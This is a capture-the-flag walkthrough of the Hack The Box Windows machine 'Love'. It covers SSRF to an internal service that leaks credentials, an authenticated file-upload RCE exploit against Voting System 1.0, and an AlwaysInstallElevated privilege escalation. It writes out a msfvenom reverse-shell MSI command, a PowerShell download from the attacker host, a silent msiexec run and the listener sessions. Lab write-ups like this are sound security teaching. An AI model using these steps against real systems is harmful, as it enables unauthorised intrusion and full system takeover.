> For the complete documentation index, see [llms.txt](https://vinetsuicide.gitbook.io/writeups/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://vinetsuicide.gitbook.io/writeups/windows/easy-boxes/love.md).

# Love

<figure><img src="https://1917368546-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Fnw4r2mxNQ0V4AzmY89Pb%2Fuploads%2FdAPwhOG8kq6skJE2D18s%2FLove.png?alt=media&amp;token=f54714ba-293b-4234-9299-8965e814fd54" alt="" width="563"><figcaption><p>Love</p></figcaption></figure>

## <mark style="color:blue;">Recon</mark>

```bash
ping -c 1 10.10.10.239
PING 10.10.10.239 (10.10.10.239) 56(84) bytes of data.
64 bytes from 10.10.10.239: icmp_seq=1 ttl=127 time=60.8 ms

--- 10.10.10.239 ping statistics ---
1 packets transmitted, 1 received, 0% packet loss, time 0ms
rtt min/avg/max/mdev = 60.757/60.757/60.757/0.000 ms
```

* Host is alive.
* Looks like OS is Windows.

Lets start nmap.

```bash
sudo nmap 10.10.10.239 -p- -Pn -T5 -sC -sV -oN love  
```

```bash
PORT      STATE SERVICE      VERSION
80/tcp    open  http         Apache httpd 2.4.46 ((Win64) OpenSSL/1.1.1j PHP/7.3.27)
| http-cookie-flags: 
|   /: 
|     PHPSESSID: 
|_      httponly flag not set
|_http-title: Voting System using PHP
|_http-server-header: Apache/2.4.46 (Win64) OpenSSL/1.1.1j PHP/7.3.27
135/tcp   open  msrpc        Microsoft Windows RPC
139/tcp   open  netbios-ssn  Microsoft Windows netbios-ssn
443/tcp   open  ssl/http     Apache httpd 2.4.46 (OpenSSL/1.1.1j PHP/7.3.27)
| tls-alpn: 
|_  http/1.1
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=staging.love.htb/organizationName=ValentineCorp/stateOrProvinceName=m/countryName=in
| Not valid before: 2021-01-18T14:00:16
|_Not valid after:  2022-01-18T14:00:16
|_http-server-header: Apache/2.4.46 (Win64) OpenSSL/1.1.1j PHP/7.3.27
|_http-title: 400 Bad Request
445/tcp   open  microsoft-ds Windows 10 Pro 19042 microsoft-ds (workgroup: WORKGROUP)
3306/tcp  open  mysql?
| fingerprint-strings: 
|   FourOhFourRequest, Help, Kerberos, LANDesk-RC, LDAPBindReq, LDAPSearchReq, LPDString, NCP, NotesRPC, SIPOptions, SMBProgNeg, TLSSessionReq, TerminalServer, WMSRequest, ms-sql-s: 
|_    Host '10.10.16.5' is not allowed to connect to this MariaDB server
5000/tcp  open  http         Apache httpd 2.4.46 (OpenSSL/1.1.1j PHP/7.3.27)
|_http-server-header: Apache/2.4.46 (Win64) OpenSSL/1.1.1j PHP/7.3.27
|_http-title: 403 Forbidden
5040/tcp  open  unknown
5985/tcp  open  http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
5986/tcp  open  ssl/http     Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
| tls-alpn: 
|_  http/1.1
|_http-title: Not Found
|_ssl-date: 2024-03-04T12:42:07+00:00; +21m32s from scanner time.
| ssl-cert: Subject: commonName=LOVE
| Subject Alternative Name: DNS:LOVE, DNS:Love
| Not valid before: 2021-04-11T14:39:19
|_Not valid after:  2024-04-10T14:39:19
|_http-server-header: Microsoft-HTTPAPI/2.0
7680/tcp  open  pando-pub?
47001/tcp open  http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49664/tcp open  msrpc        Microsoft Windows RPC
49665/tcp open  msrpc        Microsoft Windows RPC
49666/tcp open  msrpc        Microsoft Windows RPC
49667/tcp open  msrpc        Microsoft Windows RPC
49668/tcp open  msrpc        Microsoft Windows RPC
49669/tcp open  msrpc        Microsoft Windows RPC
49670/tcp open  msrpc        Microsoft Windows RPC
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port3306-TCP:V=7.94SVN%I=7%D=3/4%Time=65E5BBED%P=x86_64-pc-linux-gnu%r(
SF:Help,49,"E\0\0\x01\xffj\x04Host\x20'10\.10\.16\.5'\x20is\x20not\x20allo
SF:wed\x20to\x20connect\x20to\x20this\x20MariaDB\x20server")%r(TLSSessionR
SF:eq,49,"E\0\0\x01\xffj\x04Host\x20'10\.10\.16\.5'\x20is\x20not\x20allowe
SF:d\x20to\x20connect\x20to\x20this\x20MariaDB\x20server")%r(Kerberos,49,"
SF:E\0\0\x01\xffj\x04Host\x20'10\.10\.16\.5'\x20is\x20not\x20allowed\x20to
SF:\x20connect\x20to\x20this\x20MariaDB\x20server")%r(SMBProgNeg,49,"E\0\0
SF:\x01\xffj\x04Host\x20'10\.10\.16\.5'\x20is\x20not\x20allowed\x20to\x20c
SF:onnect\x20to\x20this\x20MariaDB\x20server")%r(FourOhFourRequest,49,"E\0
SF:\0\x01\xffj\x04Host\x20'10\.10\.16\.5'\x20is\x20not\x20allowed\x20to\x2
SF:0connect\x20to\x20this\x20MariaDB\x20server")%r(LPDString,49,"E\0\0\x01
SF:\xffj\x04Host\x20'10\.10\.16\.5'\x20is\x20not\x20allowed\x20to\x20conne
SF:ct\x20to\x20this\x20MariaDB\x20server")%r(LDAPSearchReq,49,"E\0\0\x01\x
SF:ffj\x04Host\x20'10\.10\.16\.5'\x20is\x20not\x20allowed\x20to\x20connect
SF:\x20to\x20this\x20MariaDB\x20server")%r(LDAPBindReq,49,"E\0\0\x01\xffj\
SF:x04Host\x20'10\.10\.16\.5'\x20is\x20not\x20allowed\x20to\x20connect\x20
SF:to\x20this\x20MariaDB\x20server")%r(SIPOptions,49,"E\0\0\x01\xffj\x04Ho
SF:st\x20'10\.10\.16\.5'\x20is\x20not\x20allowed\x20to\x20connect\x20to\x2
SF:0this\x20MariaDB\x20server")%r(LANDesk-RC,49,"E\0\0\x01\xffj\x04Host\x2
SF:0'10\.10\.16\.5'\x20is\x20not\x20allowed\x20to\x20connect\x20to\x20this
SF:\x20MariaDB\x20server")%r(TerminalServer,49,"E\0\0\x01\xffj\x04Host\x20
SF:'10\.10\.16\.5'\x20is\x20not\x20allowed\x20to\x20connect\x20to\x20this\
SF:x20MariaDB\x20server")%r(NCP,49,"E\0\0\x01\xffj\x04Host\x20'10\.10\.16\
SF:.5'\x20is\x20not\x20allowed\x20to\x20connect\x20to\x20this\x20MariaDB\x
SF:20server")%r(NotesRPC,49,"E\0\0\x01\xffj\x04Host\x20'10\.10\.16\.5'\x20
SF:is\x20not\x20allowed\x20to\x20connect\x20to\x20this\x20MariaDB\x20serve
SF:r")%r(WMSRequest,49,"E\0\0\x01\xffj\x04Host\x20'10\.10\.16\.5'\x20is\x2
SF:0not\x20allowed\x20to\x20connect\x20to\x20this\x20MariaDB\x20server")%r
SF:(ms-sql-s,49,"E\0\0\x01\xffj\x04Host\x20'10\.10\.16\.5'\x20is\x20not\x2
SF:0allowed\x20to\x20connect\x20to\x20this\x20MariaDB\x20server");
Service Info: Hosts: www.example.com, LOVE, www.love.htb; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb-os-discovery: 
|   OS: Windows 10 Pro 19042 (Windows 10 Pro 6.3)
|   OS CPE: cpe:/o:microsoft:windows_10::-
|   Computer name: Love
|   NetBIOS computer name: LOVE\x00
|   Workgroup: WORKGROUP\x00
|_  System time: 2024-03-04T04:41:48-08:00
| smb2-time: 
|   date: 2024-03-04T12:41:52
|_  start_date: N/A
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled but not required
| smb-security-mode: 
|   account_used: <blank>
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
|_clock-skew: mean: 2h21m32s, deviation: 4h00m00s, median: 21m32s

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 569.27 seconds
```

Couple ports are open. Lets enumerate step by step.

but before that I will add domain name to our <mark style="color:purple;">"/etc/hosts"</mark>

```bash
10.10.10.239    staging.love.htb love.htb
```

## <mark style="color:orange;">SMB</mark>

```bash
nxc smb love.htb -u '' -p ''                
SMB         10.10.10.239    445    LOVE             [*] Windows 10 Pro 19042 x64 (name:LOVE) (domain:Love) (signing:False) (SMBv1:True)
SMB         10.10.10.239    445    LOVE             [+] Love\: 
```

NetExec show that null auth is successful, lets try to list a shares.

```bash
smb love.htb -u '' -p '' --shares
SMB         10.10.10.239    445    LOVE             [*] Windows 10 Pro 19042 x64 (name:LOVE) (domain:Love) (signing:False) (SMBv1:True)
SMB         10.10.10.239    445    LOVE             [+] Love\: 
SMB         10.10.10.239    445    LOVE             [-] Error enumerating shares: STATUS_ACCESS_DENIED
```

Error, I will try another tool, because sometimes output may be different.

```bash
smbclient -L //love.htb/           
Password for [WORKGROUP\musor]:
session setup failed: NT_STATUS_ACCESS_DENIED
```

Need credentials.

Tried also RPC, lets check it.

```bash
rpcclient -U '' 10.10.10.239
Password for [WORKGROUP\]:
Cannot connect to server.  Error was NT_STATUS_LOGON_FAILURE
```

Also denied...

## <mark style="color:green;">HTTP - love.htb</mark>

<figure><img src="https://1917368546-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Fnw4r2mxNQ0V4AzmY89Pb%2Fuploads%2F66RkW4MyJWvDYRcAKsUH%2FPasted%20image%2020240304172718.png?alt=media&amp;token=1f3e4242-ce28-4bce-8be9-bb601dc90f03" alt=""><figcaption></figcaption></figure>

Looks like normal login page, nothing to interesting.

I will check if this application have public exploits, so I will understand that maybe this application is custom.

```sql
searchsploit Voting System           
------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------ ---------------------------------
 Exploit Title                                                                                                                                                                                              |  Path
------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------ ---------------------------------
Online Voting System - Authentication Bypass                                                                                                                                                                | php/webapps/43967.py
Online Voting System 1.0 - Authentication Bypass (SQLi)                                                                                                                                                     | php/webapps/50075.txt
Online Voting System 1.0 - Remote Code Execution (Authenticated)                                                                                                                                            | php/webapps/50076.txt
Online Voting System 1.0 - SQLi (Authentication Bypass) + Remote Code Execution (RCE)                                                                                                                       | php/webapps/50088.py
Online Voting System Project in PHP - 'username' Persistent Cross-Site Scripting                                                                                                                            | multiple/webapps/49159.txt
Voting System 1.0 - Authentication Bypass (SQLI)                                                                                                                                                            | php/webapps/49843.txt
Voting System 1.0 - File Upload RCE (Authenticated Remote Code Execution)                                                                                                                                   | php/webapps/49445.py
Voting System 1.0 - Remote Code Execution (Unauthenticated)                                                                                                                                                 | php/webapps/49846.txt
Voting System 1.0 - Time based SQLI  (Unauthenticated SQL injection)                                                                                                                                        | php/webapps/49817.txt
WordPress Plugin Poll_ Survey_ Questionnaire and Voting system 1.5.2 - 'date_answers' Blind SQL Injection                                                                                                   | php/webapps/50052.txt
------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------ ---------------------------------
Shellcodes: No Results
```

Woah all exploits that we need to get a shell.

But unfortunately, I tried couple of them, and they didnt worked, maybe fixed?

But Im sure that <mark style="color:red;">"Voting System 1.0 - File Upload RCE (Authenticated Remote Code Execution)"</mark> this one will work probably, but we need credentials.

Lets check https version.

## <mark style="color:green;">staging.love.htb</mark>

<figure><img src="https://1917368546-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Fnw4r2mxNQ0V4AzmY89Pb%2Fuploads%2FwRFuPd1zP7KdPIlsIvwL%2FPasted%20image%2020240304172659.png?alt=media&amp;token=91ddfab7-3fd9-4801-a7a9-e4dec5d00265" alt=""><figcaption></figcaption></figure>

Seems like something interesting, I checked everything and when I clicked on "Demo" button, there was some real functionality.

<figure><img src="https://1917368546-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Fnw4r2mxNQ0V4AzmY89Pb%2Fuploads%2FSlz8mHipsnozAPPhPuFL%2FPasted%20image%2020240304173153.png?alt=media&amp;token=4d82d35d-5ddd-427e-a983-9c5cdc18ce05" alt=""><figcaption></figcaption></figure>

I can specify url, so firstly I tried my own HTTP server that I started with Python.

```bash
python3 -m http.server 80
```

And I got a hit, but I dont think that I can do something useful with this.

## <mark style="color:red;">phoebe shell</mark>

In nmap scan there is open HTTP 5000 port, but when i navigate to it, it is forbidden.

I will try SSRF, and specify <mark style="color:red;">**"<http://127.0.0.1:5000>".**</mark>

<figure><img src="https://1917368546-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Fnw4r2mxNQ0V4AzmY89Pb%2Fuploads%2FbMw18nbBziprJY4hU4oK%2FPasted%20image%2020240304173303.png?alt=media&amp;token=5325dcf7-609e-4a95-9ff3-a79817505878" alt=""><figcaption></figcaption></figure>

And boom we got a hit, these are interesting credentials.

I can try them on SSH or on Voting System Application.

<figure><img src="https://1917368546-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Fnw4r2mxNQ0V4AzmY89Pb%2Fuploads%2F6Y3ZkvedhK4Cd202xwPD%2FPasted%20image%2020240304173430.png?alt=media&amp;token=0220bc91-def8-40b8-aaf3-97098389b7b7" alt=""><figcaption></figcaption></figure>

I tried them and we successfully logged in.

So now I can try that Authenticated RCE exploit.

But before executing it, I need to modify exploit.

<figure><img src="https://1917368546-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Fnw4r2mxNQ0V4AzmY89Pb%2Fuploads%2FnHFiRGlImbSsyy6tgJWr%2FPasted%20image%2020240304173554.png?alt=media&amp;token=0020565e-ec9b-4e76-8748-b48cf2bb4c0c" alt=""><figcaption></figcaption></figure>

Ok, now I will execute it.

```bash
python3 exploit.py
```

```bash
rlwrap nc -lnvp 8888
listening on [any] 8888 ...
connect to [10.10.16.5] from (UNKNOWN) [10.10.10.239] 50323
b374k shell : connected

Microsoft Windows [Version 10.0.19042.867]
(c) 2020 Microsoft Corporation. All rights reserved.

C:\xampp\htdocs\omrs\images>whoami /priv
whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                          State   
============================= ==================================== ========
SeShutdownPrivilege           Shut down the system                 Disabled
SeChangeNotifyPrivilege       Bypass traverse checking             Enabled 
SeUndockPrivilege             Remove computer from docking station Disabled
SeIncreaseWorkingSetPrivilege Increase a process working set       Disabled
SeTimeZonePrivilege           Change the time zone                 Disabled

C:\xampp\htdocs\omrs\images>whoami
whoami
love\phoebe
```

And boom we are in!

```bash
C:\Users\Phoebe\Desktop>type user.txt
type user.txt
c6e68c5b173a6c3bc0f40e20f5ebfc7c
```

Got first flag :)

## <mark style="color:red;">Administrator</mark>

After that I uploaded <mark style="color:blue;">winPEAS</mark> to quickly perform a scan.

And it found something interesting.

```bash
Checking AlwaysInstallElevated
  https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation#alwaysinstallelevated
    AlwaysInstallElevated set to 1 in HKLM!
    AlwaysInstallElevated set to 1 in HKCU!
```

Thats directly easy privilege escalation to Administrator.

> * This registry setting allows non-administrative users to install Microsoft Windows Installer Packages (MSI) with elevated privileges. When set to 1, any user, even without administrative privileges, can install MSI packages with full administrator rights.
> * This presents a significant security risk because it allows regular users to execute arbitrary code with elevated privileges, potentially leading to privilege escalation attacks. An attacker could exploit this vulnerability to install malicious software or manipulate system settings without proper authorization.

So lets generate a malicious payload with msfvenom.

```bash
msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.16.5 LPORT=443 -f msi -o reverse.msi
```

I started HTTP server and downloaded it.

```powershell
iwr -uri http://10.10.16.5:8080/reverse.msi -OutFile reverse.msi
```

```bash
msiexec /qn /quiet /i reverse.msi
```

If I check my listener, we will see that we got a hit.

```bash
rlwrap nc -lnvp 443         
listening on [any] 443 ...
connect to [10.10.16.5] from (UNKNOWN) [10.10.10.239] 50331
Microsoft Windows [Version 10.0.19042.867]
(c) 2020 Microsoft Corporation. All rights reserved.

C:\WINDOWS\system32>whoami
whoami
nt authority\system
```

```bash
type root.txt
16d1f7bb3b88cf646f5255a85f9eccd0
```

root.flag :)
